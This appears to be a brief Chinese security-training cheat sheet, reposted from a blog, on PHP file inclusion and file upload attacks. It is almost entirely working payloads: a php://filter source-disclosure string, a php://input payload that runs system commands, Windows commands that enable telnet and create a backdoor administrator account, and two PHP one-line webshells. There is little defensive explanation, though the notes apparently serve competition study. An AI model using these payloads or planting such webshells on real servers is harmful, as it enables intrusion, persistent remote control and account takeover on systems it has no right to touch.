中职网安 文件包含漏洞与文件上传漏洞 笔记

二、文件包含漏洞与文件上传漏洞
1.利用条件：allow_url_include = On
2.文件包含漏洞，?file=php://filter/read=convert.base64-encode/resource=index.php  可查看index.php文件的代码
3.文件包含漏洞，?file=php://input  再提交post数据 <?php system("ipconfig")?>  可执行系统cmd命令并查看
cmd部分提权常用命令：
whoami  查看当前用户
ipconfig 显示本地IP地址
net start telnet 开telnet服务
net user　　　　　　　　　　　　查看所有用户列表
net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz
net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员
文件上传：
php一句话木马<?php eval($_POST[hucys]);?> 
cmd命令执行  <?php $rel = system($_GET['cmd']); echo $rel; ?>

标签：文件,hucxsz,中职,cmd,漏洞,net,php
来源： https://blog.csdn.net/qq_48609816/article/details/120933350